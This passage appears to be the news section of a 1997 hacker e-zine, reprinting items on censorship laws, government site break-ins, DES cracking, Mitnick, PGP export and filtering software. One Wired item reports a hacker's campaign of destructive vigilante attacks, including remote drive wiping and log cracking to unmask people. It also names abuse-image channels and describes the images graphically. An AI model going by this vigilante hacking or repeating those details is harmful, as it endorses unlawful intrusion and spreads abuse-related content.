+to local law in each of the seven European countries in which the
+network operates.
+
+AOL executives denied any government pressure in updating the
+contract.
+
+0x9>-------------------------------------------------------------------------
+ 
+Title: Georgia Expands the "Instruments of Crime"
+Source: fight-censorship@vorlon.mit.edu
+
+In Georgia it is a crime, punishable by $30K and four years to use in
+furtherance of a crime:
+
+ * a telephone
+ * a fax machine
+ * a beeper
+ * email
+
+The actual use of the law, I think, is that when a person is selling drugs
+and either is in possession of a beeper, or admits to using the phone to
+facilitate a meeting, he is charged with the additional felony of using a
+phone.  This allows for selective enforcement of additional penalties for
+some people.
+
+  O.C.G.A. 16-13-32.3.
+
+  (a) It shall be unlawful for any person knowingly or intentionally to
+  use any communication facility in committing or in causing or
+  facilitating the commission of any act or acts constituting a felony
+  under this chapter. Each separate use of a communication facility
+  shall be a separate offense under this Code section.  For purposes of
+  this Code section, the term "communication facility" means any and all
+  public and private instrumentalities used or useful in the
+  transmission of writing, signs, signals, pictures, or sounds of all
+  kinds and includes mail, telephone, wire, radio, computer or computer
+  network, and all other means of communication.
+
+  (b) Any person who violates subsection (a) of this Code section shall
+  be punished by a fine of not more than $30,000.00 or by imprisonment
+  for not less than one nor more than four years, or both.
+
+0xa>-------------------------------------------------------------------------
+ 
+Title: NASA Nabs Teen Computer Hacker
+Source: Associated Press
+Author: unknown
+Date: Monday, June 2, 1997
+
+WASHINGTON (AP) - A Delaware teen-ager who hacked his way into a
+NASA web site on the Internet and left a message berating U.S.
+officials is being investigated by federal authorities, agency
+officials said Monday.
+
+NASA Inspector General Robert Gross cited the incident - the most
+recent example of a computer invasion of a NASA web site - as an
+example of how the space agency has become ``vulnerable via the
+Internet.''
+
+"We live in an information environment vastly different than 20
+years ago," Gross said in a written statement. "Hackers are
+increasing in number and in frequency of attack."
+
+In the latest case, the Delaware teen, whose name, age and
+hometown were not released, altered the Internet web site for the
+Marshall Space Flight Center in Huntsville, Ala., according to
+the statement from the computer crimes division of NASA's
+Inspector General Office.
+
+"We own you. Oh, what a tangled web we weave, when we practice to
+deceive," the teen's message said, adding that the government
+systems administrators who manage the site were "extremely
+stupid."
+
+The message also encouraged sympathizers of Kevin Mitnick, a
+notorious computer hacker, to respond to the site. Mitnick was
+indicted last year on charges stemming from a multimillion-dollar
+crime wave in cyberspace.
+
+The altered message was noticed by the computer security team in
+Huntsville but the NASA statement did not mention how long the
+message was available to the public or exactly when it was
+discovered. NASA officials weren't made available to answer
+questions about the event.
+
+In the statement, NASA called the teen's hacking "a cracking
+spree" and said it was stopped May 26 when his personal computer
+was seized.
+
+Prosecutors from the U.S. Attorney's office in Delaware and
+Alabama are handling the case with NASA's computer crimes
+division.
+
+Last March, cyberspace invaders made their way into another NASA
+web site and threatened an electronic terrorist attack against
+corporate America. The group, which called itself ``H4G1S'' in
+one message and ``HAGIS'' in another, also called for some
+well-known hackers to be released from jail.
+
+Engineers at the Goddard Space Flight Center in Greenbelt, Md.,
+quickly noticed the change and took the page off the Internet
+within 30 minutes.  NASA officials said the agency installed
+electronic security measures designed to prevent a recurrence.
+
+0xb>-------------------------------------------------------------------------
+ 
+Title: Agriculture Dept. Web Site Closed after Security Breach
+Source: Reuter
+Author: unknown
+
+WASHINGTON (June 11, 1997 00:08 a.m. EDT) - The U.S. Agriculture
+Department's Foreign Agricultural Service shut down access to its
+internet home page Tuesday after a major security breach was
+discovered, a department aide said.
+
+"It's a big, huge problem," Ed Desrosiers, a computer specialist
+in USDA's Farm Service Agency, told Reuters. "We can't guarantee
+anything's clean anymore."
+
+Someone broke into system and began "sending out a lot of
+messages" to other "machines" on the internet, Desrosiers said.
+
+The volume of traffic was so great, "we were taking down machines"
+and began receiving complaints, he said.
+
+"It's not worth our time to try to track down" the culprit,
+Desrosiers said. "Instead, we're just going to massively increase
+security."
+
+A popular feature on the FAS home page is the search function for
+"attache reports," which are filed by overseas personnel and
+provide assessments on crop conditions around the world. Although
+not official data, the reports provide key information that goes
+into USDA's monthly world supply-and-demand forecasts.
+
+It could be next week before the page is open to outside users
+again, Desrosiers said.
+
+0xc>-------------------------------------------------------------------------
+ 
+Title: Hackers Smash US Government Encryption Standard
+Source: fight-censorship@vorlon.mit.edu
+
+Oakland, California (June 18, 1997)-The 56-bit DES encryption
+standard, long claimed "adequate" by the U.S. Government, was
+shattered yesterday using an ordinary Pentium personal computer
+operated by Michael K. Sanders, an employee of iNetZ, a Salt Lake
+City, Utah-based online commerce provider. Sanders was part of a
+loosely organized group of computer users responding to the "RSA
+$10,000 DES Challenge." The code-breaking group distributed computer
+software over the Internet for harnessing idle moments of computers
+around the world to perform a 'brute force' attack on the encrypted
+data.
+
+"That DES can be broken so quickly should send a chill through the
+heart of anyone relying on it for secure communications," said Sameer
+Parekh, one of the group's participants and president of C2Net
+Software, an Internet encryption provider headquartered in Oakland,
+California (http://www.c2.net/). "Unfortunately, most people today
+using the Internet assume the browser software is performing secure
+communications when an image of a lock or a key appears on the
+screen. Obviously, that is not true when the encryption scheme is
+56-bit DES," he said.
+
+INetZ vice president Jon Gay said "We hope that this will encourage
+people to demand the highest available encryption security, such as
+the 128-bit security provided by C2Net's Stronghold product, rather
+than the weak 56-bit ciphers used in many other platforms."
+
+Many browser programs have been crippled to use an even weaker, 40-bit
+cipher, because that is the maximum encryption level the
+U.S. government has approved for export. "People located within the US
+can obtain more secure browser software, but that usually involves
+submitting an affidavit of eligibility, which many people have not
+done," said Parekh. "Strong encryption is not allowed to be exported
+from the U.S., making it harder for people and businesses in
+international locations to communicate securely," he explained.
+
+According to computer security expert Ian Goldberg, "This effort
+emphasizes that security systems based on 56-bit DES or
+"export-quality" cryptography are out-of-date, and should be phased
+out. Certainly no new systems should be designed with such weak
+encryption.'' Goldberg is a member of the University of California at
+Berkeley's ISAAC group, which discovered a serious security flaw in
+the popular Netscape Navigator web browser software.
+
+The 56-bit DES cipher was broken in 5 months, significantly faster
+than the hundreds of years thought to be required when DES was adopted
+as a national standard in 1977. The weakness of DES can be traced to
+its "key length," the number of binary digits (or "bits") used in its
+encryption algorithm. "Export grade" 40-bit encryption schemes can be
+broken in less than an hour, presenting serious security risks for
+companies seeking to protect sensitive information, especially those
+whose competitors might receive code-breaking assistance from foreign
+governments.
+
+According to Parekh, today's common desktop computers are tremendously
+more powerful than any computer that existed when DES was
+created. "Using inexpensive (under $1000) computers, the group was
+able to crack DES in a very short time," he noted. "Anyone with the
+resources and motivation to employ modern "massively parallel"
+supercomputers for the task can break 56-bit DES ciphers even faster,
+and those types of advanced technologies will soon be present in
+common desktop systems, providing the keys to DES to virtually
+everyone in just a few more years."
+
+56-bit DES uses a 56-bit key, but most security experts today consider
+a minimum key length of 128 bits to be necessary for secure
+encryption. Mathematically, breaking a 56-bit cipher requires just
+65,000 times more work than breaking a 40-bit cipher. Breaking a
+128-bit cipher requires 4.7 trillion billion times as much work as one
+using 56 bits, providing considerable protection against brute-force
+attacks and technical progress.
+
+C2Net is the leading worldwide provider of uncompromised Internet
+security software. C2Net's encryption products are developed entirely
+outside the United States, allowing the firm to offer full-strength
+cryptography solutions for international communications and
+commerce. "Our products offer the highest levels of security available
+today. We refuse to sell weak products that might provide a false
+sense of security and create easy targets for foreign governments,
+criminals, and bored college students," said Parekh. "We also oppose
+so-called "key escrow" plans that would put everyone's cryptography
+keys in a few centralized locations where they can be stolen and sold
+to the highest bidder," he added. C2Net's products include the
+Stronghold secure web server and SafePassage Web Proxy, an enhancement
+that adds full-strength encryption to any security-crippled "export
+grade" web browser software.
+
+0xd>-------------------------------------------------------------------------
+ 
+Title: Hacker May Stolen JonBenet computer Documents
+Source: Associated Press
+Author: Jennifer Mears
+
+BOULDER, Colo. (June 13, 1997 07:38 a.m. EDT) -- A computer hacker has
+infiltrated the system set aside for authorities investigating the slaying
+of JonBenet Ramsey, the latest blow to a heavily criticized inquiry.
+
+[...despite the computer not being online or connected to other computers..]
+
+Boulder police spokeswoman Leslie Aaholm said the computer was "hacked"
+sometime early Saturday. The incident was announced by police Thursday.
+
+"We don't believe anything has been lost, but we don't know what, if
+anything, has been copied," said Detective John Eller, who is leading the
+investigation into the slaying of the 6-year-old girl nearly six months ago.
+
+The computer is in a room at the district attorney's office that police
+share with the prosecutor's investigators. The room apparently had not been
+broken into. Computer experts with the Colorado Bureau of Investigations
+were examining equipment to determine what had been done.
+
+[Bullshit.  It was later found out that the machine was not hacked at all.]
+
+0xe>-------------------------------------------------------------------------
+
+Title: Hacker Vows 'Terror' for Pornographers
+Source: Wired
+Author: Steve Silberman
+
+After 17 years in the hacker underground, Christian Valor - well known 
+among old-school hackers and phone phreaks as "Se7en" - was convinced 
+that most of what gets written in the papers about computers and hacking 
+is sensationalistic jive. For years, Valor says, he sneered at reports 
+of the incidence of child pornography on the Net as
+"exaggerated/over-hyped/fearmongered/bullshit."
+
+Now making his living as a lecturer on computer security, Se7en claims
+he combed the Net for child pornography for eight weeks last year
+without finding a single image.
+
+That changed a couple of weeks ago, he says, when a JPEG mailed by an
+anonymous prankster sent him on an odyssey through a different kind of
+underground: IRC chat rooms with names like #littlegirlsex, ftp
+directories crammed with filenames like 6yoanal.jpg and 8&dad.jpg, and
+newsgroups like alt.binaries.pictures.erotica.pre-teen. The anonymous
+file, he says, contained a "very graphic" image of a girl "no older
+than 4 years old."
+
+On 8 June, Se7en vowed on a hacker's mailing list to deliver a dose of
+"genuine hacker terror" to those who upload and distribute such images
+on the Net. The debate over his methods has stirred up tough questions
+among his peers about civil liberties, property rights, and the ethics
+of vigilante justice.
+
+A declaration of war
+
+What Se7en tapped into, he says, was a "very paranoid" network of
+traders of preteen erotica. In his declaration of "public war" -
+posted to a mailing list devoted to an annual hacker's convention
+called DefCon - Se7en explains that the protocol on most child-porn
+servers is to upload selections from your own stash, in exchange for
+credits for more images.
+
+What he saw on those servers made him physically sick, he says. "For
+someone who took a virtual tour of the kiddie-porn world for only one
+day," he writes, "I had the opportunity to fully max out an Iomega
+100-MB Zip disc."
+
+Se7en's plan to "eradicate" child-porn traders from the Net is
+"advocating malicious, destructive hacking against these people." He
+has enlisted the expertise of two fellow hackers for the first wave of
+attacks, which are under way.
+
+Se7en feels confident that legal authorities will look the other way
+when the victims of hacks are child pornographers - and he claims that
+a Secret Service agent told him so explicitly. Referring to a command
+to wipe out a hard drive by remote access, Se7en boasted, "Who are
+they going to run to? The police? 'They hacked my kiddie-porn server
+and rm -rf'd my computer!' Right."
+
+Se7en claims to have already "taken down" a "major player" - an
+employee of Southwestern Bell who Se7en says was "posting ads all over
+the place." Se7en told Wired News that he covertly watched the man's
+activities for days, gathering evidence that he emailed to the
+president of Southwestern Bell. Pseudonymous remailers like
+hotmail.com and juno.com, Se7en insists, provide no security blanket
+for traders against hackers uncovering their true identities by
+cracking server logs. Se7en admits the process of gaining access to
+the logs is time consuming, however. Even with three hackers on the
+case, it "can take two or three days. We don't want to hit the wrong
+person."
+
+A couple of days after submitting message headers and logs to the
+president and network administrators of Southwestern Bell, Se7en says,
+he got a letter saying the employee was "no longer on the payroll."
+
+The hacker search for acceptance
+
+Se7en's declaration of war received support on the original mailing
+list. "I am all for freedom of speech/expression," wrote one poster,
+"but there are some things that are just wrong.... I feel a certain
+moral obligation to the human race to do my part in cleaning up the
+evil."
+
+Federal crackdowns targeting child pornographers are ineffective, many
+argued. In April, FBI director Louis Freeh testified to the Senate
+that the bureau operation dubbed "Innocent Images" had gathered the
+names of nearly 4,000 suspected child-porn traffickers into its
+database. Freeh admitted, however, that only 83 of those cases
+resulted in convictions. (The Washington Times reports that there have
+also been two suicides.)
+
+The director's plan? Ask for more federal money to fight the "dark
+side of the Internet" - US$10 million.
+
+Pitching in to assist the Feds just isn't the hacker way. As one
+poster to the DefCon list put it, "The government can't enforce laws
+on the Internet. We all know that. We can enforce laws on the
+Internet. We all know that too."
+
+The DefCon list was not a unanimous chorus of praise for Se7en's plan
+to give the pornographers a taste of hacker terror, however. The most
+vocal dissenter has been Declan McCullagh, Washington correspondent
+for the Netly News. McCullagh is an outspoken champion of
+constitutional rights, and a former hacker himself. He says he was
+disturbed by hackers on the list affirming the validity of laws
+against child porn that he condemns as blatantly unconstitutional.
+
+"Few people seem to realize that the long-standing federal child-porn
+law outlawed pictures of dancing girls wearing leotards," McCullagh
+wrote - alluding to the conviction of Stephen Knox, a graduate student
+sentenced to five years in prison for possession of three videotapes
+of young girls in bathing suits. The camera, the US attorney general
+pointed out, lingered on the girls' genitals, though they remained
+clothed. "The sexual implications of certain modes of dress, posture,
+or movement may readily put the genitals on exhibition in a lascivious
+manner, without revealing them in a nude display," the Feds argued -
+and won.
+
+It's decisions like Knox v. US, and a law criminalizing completely
+synthetic digital images "presented as" child porn, McCullagh says,
+that are making the definition of child pornography unacceptably
+broad: a "thought crime."
+
+The menace of child porn is being exploited by "censor-happy"
+legislators to "rein in this unruly cyberspace," McCullagh says. The
+rush to revile child porn on the DefCon list, McCullagh told Wired
+News, reminded him of the "loyalty oaths" of the McCarthy era.
+
+"These are hackers in need of social acceptance," he says. "They've
+been marginalized for so long, they want to be embraced for stamping
+out a social evil." McCullagh knows his position is a difficult one to
+put across to an audience of hackers. In arguing that hackers respect
+the property rights of pornographers, and ponder the constitutionality
+of the laws they're affirming, McCullagh says, "I'm trying to convince
+hackers to respect the rule of law, when hacking systems is the
+opposite of that."
+
+But McCullagh is not alone. As the debate over Se7en's declaration
+spread to the cypherpunks mailing list and alt.cypherpunks -
+frequented by an older crowd than the DefCon list - others expressed
+similar reservations over Se7en's plan.
+
+"Basically, we're talking about a Dirty Harry attitude," one network
+technician/cypherpunk told Wired News. Though he senses "real feeling"
+behind Se7en's battle cry, he feels that the best way to deal with
+pornographers is to "turn the police loose on them." Another
+participant in the discussion says that while he condemns child porn
+as "terrible, intrinsically a crime against innocence," he questions
+the effectiveness of Se7en's strategy.
+
+"Killing their computer isn't going to do anything," he says,
+cautioning that the vigilante approach could be taken up by others.
+"What happens if you have somebody who doesn't like abortion? At what
+point are you supposed to be enforcing your personal beliefs?"
+
+Raising the paranoia level
+
+Se7en's loathing for aficionados of newsgroups like
+alt.sex.pedophilia.swaps runs deeper than "belief." "I myself was
+abused when I was a kid," Se7en told Wired News. "Luckily, I wasn't a
+victim of child pornography, but I know what these kids are going
+through."
+
+With just a few hackers working independently to crack server logs,
+sniff IP addresses, and sound the alarm to network administrators, he
+says, "We can take out one or two people a week ... and get the
+paranoia level up," so that "casual traders" will be frightened away
+from IRC rooms like "#100%preteensexfuckpics."
+
+It's not JPEGs of clothed ballerinas that raise his ire, Se7en says.
+It's "the 4-year-olds being raped, the 6-year-old forced to have oral
+sex with cum running down themselves." Such images, Se7en admits, are
+very rare - even in online spaces dedicated to trading sexual imagery
+of children.
+
+"I know what I'm doing is wrong. I'm trampling on the rights of these
+guys," he says. "But somewhere in the chain, someone is putting these
+images on paper before they get uploaded. Your freedom ends when you
+start hurting other people."
+
+0xf>-------------------------------------------------------------------------
+ 
+Title: Mitnick Gets 22 Month Sentence
+Source: LA Times
+Author: Julie Tamaki
+Date: Tuesday, June 17, 1997
+
+A federal judge indicated Monday that she plans to sentence famed computer
+hacker Kevin Mitnick to 22 months in prison for cellular phone fraud and
+violating his probation from an earlier computer crime conviction.
+
+The sentencing Monday is only a small part of Mitnick's legal problems.
+Still pending against him is a 25-count federal indictment accusing him of
+stealing millions of dollars in software during an elaborate hacking spree
+while he was a fugitive. A trial date in that case has yet to be set.
+
+U.S. District Judge Mariana R. Pfaelzer on Monday held off on formally
+sentencing Mitnick for a week in order to give her time to draft conditions
+for Mitnick's probation after he serves the prison term.
+
+Pfaelzer said she plans to sentence Mitnick to eight months on the cellular
+phone fraud charge and 14 months for violating his probation from a 1988
+computer-hacking conviction, Assistant U.S. Atty. Christopher Painter said.
+The sentences will run consecutively.
+
+Mitnick faces the sentence for violating terms of his probation when he
+broke into Pac Bell voice mail computers in 1992 and used stolen passwords
+of Pac Bell security employees to listen to voice mail, Painter said. At the
+time, Mitnick was employed by Teltec Communications, which was under
+investigation by Pac Bell.
+
+0x10>-------------------------------------------------------------------------
+ 
+Title: New York Judge Prohibits State Regulation of Internet
+Source: unknown
+Author: unknown
+Date: Friday, June 20, 1997
+
+NEW YORK -- As the nation awaits a Supreme Court decision on
+Internet censorship, a federal district judge here today blocked
+New York State from enforcing its version of the federal
+Communications Decency Act (CDA).
+
+Ruling simultaneously in ACLU v. Miller, another ACLU challenge to
+state Internet regulation, a Federal District Judge in Georgia
+today struck down a law criminalizing online anonymous speech and
+the use of trademarked logos as links on the World Wide Web.
+
+In ALA v. Pataki, Federal District Judge Loretta A. Preska issued
+a preliminary injunction against the New York law, calling the
+Internet an area of commerce that should be marked off as a
+"national preserve" to protect online speakers from inconsistent
+laws that could "paralyze development of the Internet altogether."
+
+Judge Preska, acknowledging that the New York act was "clearly
+modeled on the CDA," did not address the First Amendment issues
+raised by the ACLU's federal challenge, saying that the Commerce
+Clause provides "fully adequate support" for the injunction and
+that the Supreme Court would address the other issues in its
+widely anticipated decision in Reno v. ACLU. (The Court's next
+scheduled decision days are June 23, 25 and 26.)
+
+"Today's decisions in New York and Georgia say that, whatever
+limits the Supreme Court sets on Congress's power to regulate the
+Internet, states are prohibited from acting to censor online
+expression," said Ann Beeson, an ACLU national staff attorney who
+argued the case before Judge Preska and is a member of the ACLU v.
+Miller and Reno v. ACLU legal teams.
+
+"Taken together, these decisions send a very important and
+powerful message to legislators in the other 48 states that they
+should keep their hands off the Internet," Beeson added.
+
+In a carefully reasoned, 62-page opinion, Judge Preska warned of
+the extreme danger that state regulation would pose to the
+Internet, rejecting the state's argument that the statute would
+even be effective in preventing so-called "indecency" from
+reaching minors. Further, Judge Preska observed, the state can
+already protect children through the vigorous enforcement of
+existing criminal laws.
+
+"In many ways, this decision is more important for the business
+community than for the civil liberties community," said Chris
+Hansen, a senior ACLU attorney on the ALA v. Pataki legal team and
+lead counsel in Reno v. ACLU.  "Legislatures are just about done
+with their efforts to regulate the business of Internet 'sin,' and
+have begun turning to the business of the Internet itself. Today's
+decision ought to stop that trend in its tracks."
+
+Saying that the law would reduce all speech on the Internet to a
+level suitable for a six-year-old, the American Civil Liberties
+Union, the New York Civil Liberties Union, the American Library
+Association and others filed the challenge in January of this
+year.
+
+The law, which was passed by the New York legislature late last
+year, provides criminal sanctions of up to four years in jail for
+communicating so-called "indecent" words or images to a minor.
+
+In a courtroom hearing before Judge Preska in April, the ACLU
+presented a live Internet demonstration and testimony from
+plaintiffs who said that their speech had already been "chilled"
+by the threat of criminal prosecution.
+
+"This is a big win for the people of the state of New York," said
+Norman Siegel, Executive Director of the New York Civil Liberties
+Union. "Today's ruling vindicates what we have been saying all
+along to Governor Pataki and legislators, that they cannot legally
+prevent New Yorkers from engaging in uninhibited, open and robust
+freedom of expression on the Internet."
+
+The ALA v. Pataki plaintiffs are: the American Library
+Association, the Freedom to Read Foundation, the New York Library
+Association, the American Booksellers Foundation for Free
+Expression, Westchester Library System, BiblioBytes, Association
+of American Publishers, Interactive Digital Software Association,
+Magazine Publishers of America, Public Access Networks Corp.
+(PANIX), ECHO, NYC Net, Art on the Net, Peacefire and the American
+Civil Liberties Union.
+
+Michael Hertz and others of the New York firm Latham & Watkins
+provided pro-bono assistance to the ACLU and NYCLU; Michael
+Bamberger of Sonnenschein Nath & Rosenthal in New York is also
+co-counsel in the case.  Lawyers from the ACLU are Christopher
+Hansen, Ann Beeson and Art Eisenberg, legal director of the NYCLU.
+
+0x11>-------------------------------------------------------------------------
+ 
+Title: Breaking the Crypto Barrier
+Source: Wired
+Author: Chris Oakes
+Date: 5:03am  20.Jun.97.PDT
+
+Amid a striking convergence of events bearing on
+US encryption policy this week, one development underlined what many see
+as the futility of the Clinton administration's continuing effort to
+block the export of strong encryption: The nearly instantaneous movement
+of PGP's 128-bit software from its authorized home on a Web server at
+MIT to at least one unauthorized server in Europe.
+
+Shortly after Pretty Good Privacy's PGP 5.0 freeware was made available
+at MIT on Monday, the university's network manager, Jeffrey Schiller,
+says he read on Usenet that the software had already been transmitted to
+a foreign FTP server. Ban or no ban, someone on the Net had effected the
+instant export of a very strong piece of code. On Wednesday, Wired News
+FTP'd the software from a Dutch server, just like anyone with a
+connection could have.
+
+A Commerce Department spokesman said his office was unaware of the
+breach.
+
+The event neatly coincided with the appearance of a new Senate bill that
+seeks to codify the administration's crypto policy, and an announcement
+Wednesday that an academic/corporate team had succeeded in breaking the
+government's standard 56-bit code.
+
+The software's quick, unauthorized spread to foreign users might have an
+unexpected effect on US law, legal sources noted.
+
+"If [Phil] Zimmermann's [original PGP] software hadn't gotten out on the
+Internet and been distributed worldwide, unquestionably we wouldn't have
+strong encryption today," said lawyer Charles Merrill, who chairs his
+firm's computer and high-tech law-practice group. Actions like the PGP
+leak, he speculated, may further the legal flow of such software across
+international borders.
+
+Said Robert Kohn, PGP vice president and general counsel: "We're
+optimistic that no longer will PGP or companies like us have to do
+anything special to export encryption products."
+
+The Web release merely sped up a process already taking place using a
+paper copy of the PGP 5.0 source code and a scanner - reflecting the
+fact it is legal to export printed versions of encryption code.
+
+On Wednesday, the operator of the International PGP Home Page announced
+that he had gotten his hands on the 6,000-plus-page source code, had
+begun scanning it, and that a newly compiled version of the software
+will be available in a few months.
+
+Norwegian Stale Schumaker, who maintains the site, said several people
+emailed and uploaded copies of the program to an anonymous FTP server he
+maintains. But he said he deleted the files as soon as he was aware of
+them, because he wants to "produce a version that is 100 percent legal"
+by scanning the printed code.
+
+The paper copy came from a California publisher of technical manuals and
+was printed with the cooperation of PGP Inc. and its founder, Phil
+Zimmermann. Schumaker says he does not know who mailed his copy.
+
+"The reason why we publish the source code is to encourage peer review,"
+said PGP's Kohn, "so independent cryptographers can tell other people
+that there are no back doors and that it is truly strong encryption."
+
+Schumaker says his intentions are farther-reaching.
+
+"We are a handful of activists who would like to see PGP spread to the
+whole world," his site reads, alongside pictures of Schumaker readying
+pages for scanning. "You're not allowed to download the program from
+MIT's Web server because of the archaic laws in the US. That's why we
+exported the source-code books."
+
+0x12>-------------------------------------------------------------------------
+
+Title: Setback in Efforts to Secure Online Privacy
+Source: unknown
+Author: unknown
+Date: Thursday, June 19, 1997
+
+WASHINGTON -- A Senate committee today setback legislative efforts to
+secure online privacy, approving legislation that would restrict the right
+of businesses and individuals both to use encryption domestically and to
+export it.
+
+     On a voice vote, the Senate Commerce Committee adopted legislation that
+essentially reflects the Clinton Administration's anti-encryption policies.
+
+     The legislation approved today on a voice vote by the Senate Commerce
+Committee was introduced this week by Senate Commerce Committee Chairman
+John McCain, Republican of Arizona, and co-sponsored by Democrats Fritz
+Hollings of South Carolina; Robert Kerry of Nebraska and John Kerry of
+Massachusetts.
+
+     Encryption programs scramble information so that it can only be read
+with a "key" -- a code the recipient uses to unlock the scrambled
+electronic data.  Programs that use more than 40 bits of data to encode
+information are considered "strong" encryption. Currently, unless these
+keys are made available to the government, the Clinton Administration bans
+export of hardware or software containing strong encryption, treating
+these products as "munitions."
+
+     Privacy advocates continue to criticize the Administration's
+stance, saying that the anti-cryptography ban has considerably
+weakened U.S. participation in the global marketplace, in addition
+to curtailing freedom of speech by denying users the right to "speak"
+using encryption. The ban also violates the right to privacy by
+limiting the ability to protect sensitive information in the new
+computerized world.
+
+     Today's committee action knocked out of consideration the so-called
+"Pro-CODE" legislation, a pro-encryption bill introduced by Senator
+Conrad Burns, Republican of Montana. Although the Burns legislation
+raised some civil liberties concerns, it would have lifted export
+controls on encryption programs and generally protected individual
+privacy.
+
+     "Privacy, anonymity and security in the digital world depend on
+encryption," said Donald Haines, legislative counsel on privacy and
+cyberspace issues for the ACLU's Washington National Office. "The aim
+of the Pro-CODE bill was to allow U.S. companies to compete with
+industries abroad and lift restrictions on the fundamental right to
+free speech, the hallmark of American democracy."
+
+     "Sadly, no one on the Commerce Committee, not even Senator Burns,
+stood up and defended the pro-privacy, pro-encryption effort," Haines
+added.
+
+     In the House, however, strong encryption legislation that would add
+new privacy protections for millions of Internet users in this country and
+around the world has been approved by two subcommittees.
+
+     The legislation -- H.R. 695, the "Security and Freedom Through
+Encryption Act" or SAFE -- would make stronger encryption products
+available to American citizens and users of the Internet around the
+world. It was introduced by Representative Robert W. Goodlatte, Republican
+of Virginia.
+
+     "We continue to work toward the goal of protecting the privacy of all
+Internet users by overturning the Clinton Administration's unreasonable
+encryption policy," Haines concluded
+
+0x13>-------------------------------------------------------------------------
+
+Title: Captain Crunch Web Site Now Moved
+Source: Telecom Digest  17.164
+
+The Cap'n Crunch home page URL has been changed.  The new URL is now
+http://crunch.woz.org/crunch
+
+I've made significant changes to the site, added a FAQ based on a lot
+of people asking me many questions about blue boxing, legal stuff, and
+hacking in general.  The FAQ will be growing all the time, as I go
+through all the requests for information that many people have sent.
+"Email me" if you want to add more questions.
+
+Our new server is now available to host web sites for anyone who wants
+to use it for interesting projects.  This is for Elite people only,
+and you have to send me a proposal on what you plan to use it for.
+
+[So now old John gets to decide who is elite and who isn't.]
+
+I'm open for suggestions, and when you go up to the WebCrunchers web
+site: http://crunch.woz.org
+
+You'll get more details on that.  Our server is a Mac Power PC,
+running WebStar web server, connected through a T-1 link to the
+backbone.  I know that the Mac Webserver might be slower, but I had
+security in mind when I picked it.  Besides, I didn't pick it, Steve
+Wozniak did...  :-) So please don't flame me for using a Mac.
+
+I know that Mac's are hated by hackers, but what the heck ... at least
+we got our OWN server now.
+
+I also removed all the blatant commercial hipe from the home page and
+put it elsewhere.  But what the heck ... I should disserve to make
+SOME amount of money selling things like T-shirts and mix tapes.
+
+We plan to use it for interesting projects, and I want to put up some
+Audio files of Phone tones.  For instance, the sound of a blue box
+call going through, or some old sounds of tandom stacking.  If there
+are any of you old-timers out there that might have some interesting
+audio clips of these sounds, please get in touch with me.
+
+[There is already a page out there with those sounds and a lot more..
+ done by someone who discovered phreaking on their own. Little known
+ fact because of all the obscurement: John Draper did not discover
+ blue boxing. It was all taught to him.]
+
+Our new Domain name registration will soon be activated, and at that
+time our URL will be:
+
+http://www.webcrunchers.com        - Our Web hosting server
+http://www.webcrunchers.com/crunch - Official Cap'n Crunch home page
+
+Regards,
+Cap'n Crunch
+
+0x14>-------------------------------------------------------------------------
+
+Title: US Justive Dept. Investigating Network Solutions
+Source: New York Times
+Author: Agis Salpukas
+Date: 7 July '97
+
+  The Justice Department has begun an investigation into the
+ practice of assigning Internet addresses to determine if the
+ control that Network Solutions Inc. exercises over the process
+ amounts to a violation of antitrust laws.
+
+  The investigation was disclosed by the company Thursday in
+ documents filed with the Securities and Exchange Commission. The
+ filing came as part of a proposed initial stock offering that is
+ intended to raise $35 million.
+
+  The investigation was first reported in The Washington Post on
+ Sunday.
+
+  Network Solutions, which is based in Herndon, Va., and is a
+ subsidiary of Science Applications International Corp., has been
+ the target of a growing chorus of complaints and two dozen
+ lawsuits as the Internet has expanded and the competition for
+ these addresses, or domain names, has grown more intense.
+
+0x15>-------------------------------------------------------------------------
+
+Title: Cyber Patrol Bans Crypt Newsletter
+Source: Crypt Newsletter
+Author: George Smith
+Date: June 19, 1997
+
+Hey, buddy, did you know I'm a militant extremist? Cyber Patrol, the
+Net filtering software designed to protect your children from
+cyberfilth, says so. Toss me in with those who sleep with a copy of
+"The Turner Diaries" under their pillows and those who file nuisance
+liens against officials of the IRS. Seems my Web site is dangerous
+viewing.
+
+I discovered I was a putative militant extremist while reading a
+story on Net censorship posted on Bennett Haselton's PeaceFire
+Web site. Haselton is strongly critical of Net filtering software and
+he's had his share of dustups with vendors like Cyber Patrol, who
+intermittently ban his site for having the temerity to be a naysayer.
+
+Haselton's page included some links so readers could determine what
+other Web pages were banned by various Net filters. On a lark, I typed
+in the URL of the Crypt Newsletter, the publication I edit. Much to my
+surprise, I had been banned by Cyber Patrol. The charge? Militant
+extremism. Cyber Patrol also has its own facility for checking if a
+site is banned, called the CyberNOT list. Just to be sure, I
+double-checked. Sure enough, I was a CyberNOT.
+
+Now you can call me Ray or you can call me Joe, but don't ever call me
+a militant extremist! I've never even seen one black helicopter
+transporting U.N. troops to annex a national park.
+
+However, nothing is ever quite as it seems on the Web and before I
+went into high dudgeon over political censorship--the Crypt Newsletter
+has been accused of being "leftist" for exposing various
+government, academic, and software industry charlatans--I told some of
+my readership. Some of them wrote polite--well, almost polite--letters
+to Debra Greaves, Cyber Patrol's head of Internet research. And
+Greaves wrote back almost immediately, indicating it had all been a
+mistake.
+
+My Web site was blocked as a byproduct of a ban on another page on the
+same server. "We do have a [blocked] site off of that server with a
+similar directory. I have modified the site on our list to be more
+unique so as to not affect [your site] any longer," she wrote.
+
+Perhaps I should have been reassured that Cyber Patrol wasn't banning
+sites for simply ridiculing authority figures, a favorite American
+past time. But if anything, I was even more astonished to discover th
+company's scattershot approach to blocking. It doesn't include precise
+URLs in its database. Instead, it prefers incomplete addresses that
+block everything near the offending page. The one that struck down
+Crypt News was "soci.niu.edu/~cr," a truncated version of my complete
+URL. In other words: any page on the machine that fell under "~cr" was
+toast.
+
+Jim Thomas, a sociology professor at Northern Illinois University,
+runs this particular server, and it was hard to imagine what would be
+militantly extreme on it. Nevertheless, I ran the news by Thomas. It
+turns out that the official home page of the American Society of
+Criminology's Critical Criminology Division, an academic resource,
+was the target. It features articles from a scholarly criminology
+journal and has the hubris to be on record as opposing the death
+penalty but didn't appear to have anything that would link it with
+bomb-throwing anarchists, pedophiles, and pornographers.
+
+There was, however, a copy of the Unabomber Manifesto on the page.
+
+I told Thomas I was willing to bet $1,000 cash money that Ted
+Kaczynski's rant was at the root of Cyber Patrol's block.
+Thomas confirmed it, but I can't tell you his exact words. It
+might get this page blocked, too.
+
+What this boils down to is that Cyber Patrol is banning writing on the
+Web that's been previously published in a daily newspaper: The
+Washington Post. It can also be said the Unabomber Manifesto already
+has been delivered to every corner of American society.
+
